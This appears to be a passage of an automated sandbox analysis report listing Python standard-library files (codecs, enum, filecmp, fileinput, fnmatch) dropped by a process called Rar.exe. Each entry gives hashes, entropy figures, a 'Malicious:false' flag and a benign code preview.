                                                                                                                                                                                      Preview:""" Python 'utf-16' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs, sys....### Codec APIs....encode = codecs.utf_16_encode....def decode(input, errors='strict'):.. return codecs.utf_16_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.encoder = None.... def encode(self, input, final=False):.. if self.encoder is None:.. result = codecs.utf_16_encode(input, self.errors)[0].. if sys.byteorder == 'little':.. self.encoder = codecs.utf_16_le_encode.. else:.. self.encoder = codecs.utf_16_be_encode.. return result.. return self.encoder(input, self.errors)[0].... def reset(self):.. codecs.IncrementalEncoder.reset(self).. self.encoder = None.... de
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1079
                                                                                                                                                                                      Entropy (8bit):4.776020747108792
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JMSEVyWuq1IjaatMufQBb+OyW80kzyWEzryW79ZKj9kJxFplR:JMS1q1I2aCuqEzSzhTKOJxTz
                                                                                                                                                                                      MD5:71C7BEDB2761CE2BCD7D4AB422CF4F40
                                                                                                                                                                                      SHA1:9BE6A38B88716031ED83825611C3B010284C3677
                                                                                                                                                                                      SHA-256:16329B46D794F4D13B38A7A2540002E72E176D85237872CA3A24BF3C90D7665C
                                                                                                                                                                                      SHA-512:D72E83FB2FD71EED49EC72F9B99B87A0341B2923091C6D92B5DEAB7C380418F8BFB868EE064A76FD321EBD2C2D8560A2559D76401730F199870374B4B555E35B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'utf-16-be' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_16_be_encode....def decode(input, errors='strict'):.. return codecs.utf_16_be_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_16_be_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_16_be_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_16_be_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_16_be_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-16-be',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1079
                                                                                                                                                                                      Entropy (8bit):4.763394951954305
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:J+SEVyWMq1IjP8atMufQfb+OyWPy0kzyWuzryWP19ZKj9qJxFplR:J+SHq1I4aCuYizgzXTKQJxTz
                                                                                                                                                                                      MD5:E34C5A24FE48A17FCBFC4335389F6C4E
                                                                                                                                                                                      SHA1:4FD9811F688CE9ADDF6B1315600707C46BA02D56
                                                                                                                                                                                      SHA-256:6D3B04F3ABD9FB6151FEE5CA0426C2E7ED2677EF1358C269747FF8946FFC02B9
                                                                                                                                                                                      SHA-512:2FE8D6111B3A81F509BB67AB452CEDF9721501222F16E3CCDC4E412BF7BB2383317269ED4059E2C1E82434EF6830794A6EB8AA7DDA2E6230290A8027E601BB10
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'utf-16-le' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_16_le_encode....def decode(input, errors='strict'):.. return codecs.utf_16_le_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_16_le_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_16_le_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_16_le_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_16_le_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-16-le',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5279
                                                                                                                                                                                      Entropy (8bit):4.273683297819166
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:g+tqC0buY5lRlzeRCGEFdIPv5lLoQwLt6ofvBUpzdf/0iL7+zykV9bkMpZ/ut1fA:DkCSuolRMRCRMhlL7wLt7vYfVL7qbbpd
                                                                                                                                                                                      MD5:616CF58B40671374C8A7BB69A3EBC565
                                                                                                                                                                                      SHA1:2F71BE2439277B332CC255B7E0B0F11AFF9AB090
                                                                                                                                                                                      SHA-256:97F6038F368954DD48BE9B5FA41B1395A71FCA0271B0FEA69F8E16F9F6633775
                                                                                                                                                                                      SHA-512:43D921D34974BA356A0AE3B650516B7E1108DBFB10618BAC22A0485A5AD1B55D73B1090F77C69C67ACD0C3BE231E4DBD02A32040BCF88FA646610C91F819F341
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""..Python 'utf-32' Codec.."""..import codecs, sys....### Codec APIs....encode = codecs.utf_32_encode....def decode(input, errors='strict'):.. return codecs.utf_32_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.encoder = None.... def encode(self, input, final=False):.. if self.encoder is None:.. result = codecs.utf_32_encode(input, self.errors)[0].. if sys.byteorder == 'little':.. self.encoder = codecs.utf_32_le_encode.. else:.. self.encoder = codecs.utf_32_be_encode.. return result.. return self.encoder(input, self.errors)[0].... def reset(self):.. codecs.IncrementalEncoder.reset(self).. self.encoder = None.... def getstate(self):.. # state info we return to the caller:.. # 0: stream is in natural order for th
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):967
                                                                                                                                                                                      Entropy (8bit):4.64840879615024
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:g6VyWEq1IjsatMufQ3b+OyWi0kzyWWzryWF9ZKj9KJxFplR:gRq1IQaCusKzwzXTKYJxTz
                                                                                                                                                                                      MD5:85519A8598572F85931621ACCB60DB87
                                                                                                                                                                                      SHA1:2B7912D3F1D4042A0778C22C068A18A9AD00B990
                                                                                                                                                                                      SHA-256:A3698A68287CC78323117D14BE3B0B40F46289A850EB06AA9A5328D44B2A30EF
                                                                                                                                                                                      SHA-512:AAF1FB52FCB6BCE9D3E026BD4866149D48F5E2434A735DED9165C65A5FD4D0186CC44715A797A890F4E01C9E4CB44453BCA8D4BA6993B93811739CA80E86F5FA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""..Python 'utf-32-be' Codec.."""..import codecs....### Codec APIs....encode = codecs.utf_32_be_encode....def decode(input, errors='strict'):.. return codecs.utf_32_be_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_32_be_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_32_be_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_32_be_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_32_be_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-32-be',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):967
                                                                                                                                                                                      Entropy (8bit):4.629711576470682
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:gEVyWWq1IjyatMufQpb+OyWE0kzyWczryWj9ZKj95WJxFplR:g5q1IeaCuG8zizhTKGJxTz
                                                                                                                                                                                      MD5:6647D201D3BAD385BD7897DF02EC45ED
                                                                                                                                                                                      SHA1:AADB093709162E4B5F9ABA0590235AFE3D96246B
                                                                                                                                                                                      SHA-256:945AF03D1DA591640DE7176BEF879658594B399AC7BBE564D790893CA7B38A73
                                                                                                                                                                                      SHA-512:CF7F010E0E199BD017636894D7B1B060E21D2ADF13D81BAE710046889D48604A01D05F10F1B1ACA8033F19E8254857A93334CBBF471E55FD58BD4888B190CE62
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""..Python 'utf-32-le' Codec.."""..import codecs....### Codec APIs....encode = codecs.utf_32_le_encode....def decode(input, errors='strict'):.. return codecs.utf_32_le_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_32_le_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_32_le_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_32_le_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_32_le_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-32-le',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):984
                                                                                                                                                                                      Entropy (8bit):4.635801396513396
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JWyVyW6q1IjWatMufQVb+OyWg0kzyW4zryWH9ZKj9+5JxFplR:JWjq1IiaCu24zmzNTK85JxTz
                                                                                                                                                                                      MD5:ECFD453A49D4C576E4F189CF6B23376C
                                                                                                                                                                                      SHA1:70B61C19024F20BBC476C11D3CE95AA484225D09
                                                                                                                                                                                      SHA-256:1BE7FC4C85EDAAB33427D3F1230D56B8A4B0D75566F726D9DFC50FACEA36688B
                                                                                                                                                                                      SHA-512:F6AB67F17F586459362581DD894D3CAF62D67E283C075DFCD15B2D03E0AC79FF53E31853900A9EFF5E8778ECEC7AEE7A945EA55368D663FF82F657E7950B4A51
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'utf-7' Codec....Written by Brian Quinlan (brian@sweetapp.com)..."""..import codecs....### Codec APIs....encode = codecs.utf_7_encode....def decode(input, errors='strict'):.. return codecs.utf_7_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_7_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_7_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_7_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_7_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-7',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1047
                                                                                                                                                                                      Entropy (8bit):4.729776202710733
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JgqSEVyW7yEq1IjPatMufQ7y3b+OyWR0kzyW7yWzryWc9ZKj9/JxFplR:J1SKyEq1IjaCuwyr5z1yWzeTKZJxTz
                                                                                                                                                                                      MD5:F932D95AFCAEA5FDC12E72D25565F948
                                                                                                                                                                                      SHA1:2685D94BA1536B7870B7172C06FE72CF749B4D29
                                                                                                                                                                                      SHA-256:9C54C7DB8CE0722CA4DDB5F45D4E170357E37991AFB3FCDC091721BF6C09257E
                                                                                                                                                                                      SHA-512:A10035AE10B963D2183D31C72FF681A21ED9E255DDA22624CBAF8DBED5AFBDE7BE05BB719B07573DE9275D8B4793D2F4AEF0C0C8346203EEA606BB818A02CAB6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'utf-8' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_8_encode....def decode(input, errors='strict'):.. return codecs.utf_8_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_8_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_8_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_8_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_8_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-8',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReade
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4263
                                                                                                                                                                                      Entropy (8bit):4.440495855479389
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:JGJ9aCCIFyqPICuY5lRlDrwzRC35v5lLo3YCaLt3AvBNiLD1Lg9Ft1QYxTKB3:8J9vCIFTwCuolR9rwzRCJhlLIaLtQv+d
                                                                                                                                                                                      MD5:99B035D3C80B206F86E525A4DB7704D3
                                                                                                                                                                                      SHA1:5006274B7CC61564CF6839AC070631F788FD5FCB
                                                                                                                                                                                      SHA-256:21A95BB95448F2F064F08AA2C89E843B87A20A5A13C45C6C47C288F2BE5219A4
                                                                                                                                                                                      SHA-512:B19A6876EB04CD5739F99C7C0A07B2269E2EB9A72199A656149DD2B87A25EB0F9945CD9CAEFD2B7DA8756386468294493C6353645CB055343F008CDCFF115F4F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'utf-8-sig' Codec..This work similar to UTF-8 with the following changes:....* On encoding/writing a UTF-8 encoded BOM will be prepended/written as the.. first three bytes.....* On decoding/reading if the first three bytes are a UTF-8 encoded BOM, these.. bytes will be skipped..."""..import codecs....### Codec APIs....def encode(input, errors='strict'):.. return (codecs.BOM_UTF8 + codecs.utf_8_encode(input, errors)[0],.. len(input))....def decode(input, errors='strict'):.. prefix = 0.. if input[:3] == codecs.BOM_UTF8:.. input = input[3:].. prefix = 3.. (output, consumed) = codecs.utf_8_decode(input, errors, True).. return (output, consumed+prefix)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.first = 1.... def encode(self, input, final=False):.. if self.first:.. self.first = 0.. r
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2954
                                                                                                                                                                                      Entropy (8bit):4.703525654326454
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:XnE2/bf1OV5FPdLLlKTOARSMoxz1AFPLpLGpW7NRp6/df1Fo141RzuwBvIvPTKrf:XESf1OVjPpUOAoMot8P1HJydf/omXu+P
                                                                                                                                                                                      MD5:C62CEDA36D6B362A2250094DFA2EF15A
                                                                                                                                                                                      SHA1:D96068DC9790D38B44F3DA580F134EF1C7288B33
                                                                                                                                                                                      SHA-256:3991C68ACBB5CE946C6BA71CCB044FBBB449F9EAC9B76262456537EAEBEF9340
                                                                                                                                                                                      SHA-512:6C0296817CA26680858DB78B38BF1D1BE39FC7EDB7894979251EA3281496E7447914A12C9C5B41A1EAD12610DD472C00FF9752816FE30CFF4298C083DA29B3A3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Python 'uu_codec' Codec - UU content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com). Some details were..adapted from uu.py which was written by Lance Ellinghouse and..modified by Jack Jansen and Fredrik Lundh..."""....import codecs..import binascii..from io import BytesIO....### Codec APIs....def uu_encode(input, errors='strict', filename='<data>', mode=0o666):.. assert errors == 'strict'.. infile = BytesIO(input).. outfile = BytesIO().. read = infile.read.. write = outfile.write.... # Remove newline chars from filename.. filename = filename.replace('\n','\\n').. filename = filename.replace('\r','\\r').... # Encode.. write(('begin %o %s\n' % (mode & 0o777, filename)).encode('ascii')).. chunk = read(45).. while chunk:.. write(binascii.b2a_uu(chunk)).. chunk = read(45).. write(b' \nend\n').... return (outfile.getvalue(), len(input))....def uu_decode(input, error
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2281
                                                                                                                                                                                      Entropy (8bit):4.555875191198799
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:XLDD4W1AIejO1AI73101ouY51wdP7z0I51wzD5x6Ftx0+HvIvPTKyJxTPH:XHD4W/ejO/73OauY5y7z/58uXnA3TKyD
                                                                                                                                                                                      MD5:77C7F92636D3B55460B5E1AFD451D5DB
                                                                                                                                                                                      SHA1:DCE6B27A30BC191F9CFA34DEA5A27682AE274DE4
                                                                                                                                                                                      SHA-256:9B660028249BDB7E9B80AF1D5432BF0C90B132A6D0DD205E2DED2A3B3275B728
                                                                                                                                                                                      SHA-512:93E2E6197321CAD932F88F234EBFAD23F88ABB00C18D2F80C5711D15119CA4D0D1AB261156D6E9A7E1FEEA8A30675759823A3353F353551BA887101CDBBFA98D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Python 'zlib_codec' Codec - zlib compression encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import zlib # this codec needs the optional zlib module !....### Codec APIs....def zlib_encode(input, errors='strict'):.. assert errors == 'strict'.. return (zlib.compress(input), len(input))....def zlib_decode(input, errors='strict'):.. assert errors == 'strict'.. return (zlib.decompress(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return zlib_encode(input, errors).. def decode(self, input, errors='strict'):.. return zlib_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. assert errors == 'strict'.. self.errors = errors.. self.compressobj = zlib.compressobj().... def encode(self, input, final=False):.. if final:.. c
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):40884
                                                                                                                                                                                      Entropy (8bit):4.212002396918681
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:kSaCRtqc9awL8yzjb4IuSzIcvYFgvHEo0FBbefYu4V+QOxTCe7IpW3W+KP4qxkIr:kShRtqcdp43cvcZFBNFdaI5h/EiAi
                                                                                                                                                                                      MD5:F87CAC79AB835BAC55991134E9C64A35
                                                                                                                                                                                      SHA1:63D509BF705342A967CDD1AF116FE2E18CD9346F
                                                                                                                                                                                      SHA-256:303AFEA74D4A1675A48C6A8D7C4764DA68DBEF1092DC440E4BF3C901F8155609
                                                                                                                                                                                      SHA-512:9A087073E285F0F19AB210ECEEFB9E2284FFFD87C273413E66575491023A8DCB4295B7C25388F1C2E8E16A74D3B3BFF13EC725BE75DC827541E68364E3A95A6D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import sys..from types import MappingProxyType, DynamicClassAttribute......__all__ = [.. 'EnumMeta',.. 'Enum', 'IntEnum', 'Flag', 'IntFlag',.. 'auto', 'unique',.. ]......def _is_descriptor(obj):.. """.. Returns True if obj is a descriptor, False otherwise... """.. return (.. hasattr(obj, '__get__') or.. hasattr(obj, '__set__') or.. hasattr(obj, '__delete__').. )....def _is_dunder(name):.. """.. Returns True if a __dunder__ name, False otherwise... """.. return (.. len(name) > 4 and.. name[:2] == name[-2:] == '__' and.. name[2] != '_' and.. name[-3] != '_'.. )....def _is_sunder(name):.. """.. Returns True if a _sunder_ name, False otherwise... """.. return (.. len(name) > 2 and.. name[0] == name[-1] == '_' and.. name[1:2] != '_' and.. name[-2:-1] != '_'.. )....def _is_priv
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10491
                                                                                                                                                                                      Entropy (8bit):4.527930173678213
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:S4TNBBnKhVsBrA7go4ly/vF1AUCzRUYqRvmC14ziCI6mM/MXiYPWEiOVtYhV+BdI:SWZvoF/vrierHCJmM/MltcV+T9x9FxS
                                                                                                                                                                                      MD5:5BFEBC272A65E815586C0B477529A23B
                                                                                                                                                                                      SHA1:ABFDCD66A595B8E4FBD983F02DB3E3E17EFBE7D2
                                                                                                                                                                                      SHA-256:DF39A8D67A582E8E4F54B665B7FD5D87E0754982AC5FBDD6CED3E09039CDAE8D
                                                                                                                                                                                      SHA-512:04B93F5EAD263FF9889AE3CF97950263559EA8F454594A21F2041973B0DD340564DF5A4F1BEDFA313FDD25BBAB0013ED29FAA3FF911CE9A931C3C3631F4407B8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utilities for comparing files and directories.....Classes:.. dircmp....Functions:.. cmp(f1, f2, shallow=True) -> int.. cmpfiles(a, b, common) -> ([], [], []).. clear_cache()...."""....import os..import stat..from itertools import filterfalse..from types import Generiuseras....__all__ = ['clear_cache', 'cmp', 'dircmp', 'cmpfiles', 'DEFAULT_IGNORES']...._cache = {}..BUFSIZE = 8*1024....DEFAULT_IGNORES = [.. 'RCS', 'CVS', 'tags', '.git', '.hg', '.bzr', '_darcs', '__pycache__']....def clear_cache():.. """Clear the filecmp cache.""".. _cache.clear()....def cmp(f1, f2, shallow=True):.. """Compare two files..... Arguments:.... f1 -- First file name.... f2 -- Second file name.... shallow -- treat files as identical if their stat signatures (type, size,.. mtime) are identical. Otherwise, files are considered different.. if their sizes or contents differ. [default: True].... Return value:.... True if the files are the same
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16904
                                                                                                                                                                                      Entropy (8bit):4.324042229701554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:aPuyi2h40tVqXZqRPUJeRalQFufMR2RgzRXhRWRhRHR8p8ido/5V6E0j0ZP5Od/C:muy7h40QZqR/nFufe8gNXXcXx4oVPZPn
                                                                                                                                                                                      MD5:53551CACE03FF1ECBAF2BB02E0F07F1E
                                                                                                                                                                                      SHA1:06C4B1BA4C943CC08A468E5603AEFE7FAEAEFD20
                                                                                                                                                                                      SHA-256:8EE12B8E0A09A58129E2AB4D12FA1B132054F12C4090F7FACB943A163C09710F
                                                                                                                                                                                      SHA-512:EB108AA2557C4A556EF2CDAEFBA2CEC5A95AB2B72DFFCF9B2F96A6199E4202189CAF2E432A67FC907C3FC604EFB7ECE50D859A471D2DB26DFF8C6D0212BB2709
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Helper class to quickly write a loop over all standard input files.....Typical use is:.... import fileinput.. for line in fileinput.input(encoding="utf-8"):.. process(line)....This iterates over the lines of all files listed in sys.argv[1:],..defaulting to sys.stdin if the list is empty. If a filename is '-' it..is also replaced by sys.stdin and the optional arguments mode and..openhook are ignored. To specify an alternative list of filenames,..pass it as the argument to input(). A single file name is also allowed.....Functions filename(), lineno() return the filename and cumulative line..number of the line that has just been read; filelineno() returns its..line number in the current file; isfirstline() returns true iff the..line just read is the first line of its file; isstdin() returns true..iff the line was read from sys.stdin. Function nextfile() closes the..current file so that the next iteration will read the first line from..the next file (if any); lines not
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6912
                                                                                                                                                                                      Entropy (8bit):4.406960177155352
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:mgdA3GVpoP8oQAhpt4CLJzovn6WkPmByCJi9Xknf06hAIbFR4E:X4CFaJQyCJi9Xkf7x
                                                                                                                                                                                      MD5:9EDB2D03A76A80ABE64419ACA82EB8A9
                                                                                                                                                                                      SHA1:1F4C2A1965749322D8F00A09B2F9C5CEBC10D838
                                                                                                                                                                                      SHA-256:99069DC503E3AA219B5948A5795F1E03A2D4D16786707F7AC10684B4486B66CE
                                                                                                                                                                                      SHA-512:456828214E46FF835BE80BCB047A044EE3DA189992E7A84D79DD35D61A6737DAF523F8550DEE6B92E926BD3CBF50F40F09DCB78D1D136FCFCB21B253DFDFC8C5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Filename matching with shell patterns.....fnmatch(FILENAME, PATTERN) matches according to the local convention...fnmatchcase(FILENAME, PATTERN) always takes case in account.....The functions operate by translating the pattern into a regular..expression. They cache the compiled regular expressions for speed.....The function translate(PATTERN) returns a regular expression..corresponding to PATTERN. (It does not compile it.).."""..import os..import posixpath..import re..import functools....__all__ = ["filter", "fnmatch", "fnmatchcase", "translate"]....# Build a thread-safe incrementing counter to help create unique regexp group..# names across calls...from itertools import count.._nextgroupnum = count().__next__..del count....def fnmatch(name, pat):.. """Test whether FILENAME matches PATTERN..... Patterns are Unix shell style:.... * matches everything.. ? matches any single character.. [seq] matches any character in seq.. [!seq] matches any char not i
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28990
                                                                                                                                                                                      Entropy (8bit):4.386995679707714
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:sYYcjYLGi0di34CXYWETikB0040ArA4cwNlxpjOmGa+:sYzsLGi0649J7Qxpsa+
                                                                                                                                                                                      MD5:D79E7362E8855E4216B46F90A2D664DF
                                                                                                                                                                                      SHA1:5580BD5171CED40ADFBF2E95C5DBCEC184A44E20
